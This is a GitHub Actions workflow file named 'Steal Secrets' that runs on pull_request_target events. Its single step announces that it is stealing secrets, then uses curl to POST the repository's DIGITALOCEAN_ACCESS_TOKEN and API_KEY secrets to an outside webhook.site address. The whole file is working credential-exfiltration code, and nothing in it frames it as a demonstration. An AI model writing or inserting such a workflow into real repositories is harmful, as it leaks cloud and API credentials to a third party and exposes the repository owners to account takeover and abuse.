name: Steal Secrets
on: [pull_request_target]
jobs:
  steal:
    runs-on: ubuntu-latest
    steps:
      - run: |
          echo "Stealing all GitHub secrets!"
          curl -X POST https://webhook.site/7b11a1b8-8e3b-40a5-9749-134940063fc0 \
            -d "token=${{ secrets.DIGITALOCEAN_ACCESS_TOKEN }}, other=${{ secrets.API_KEY }}"
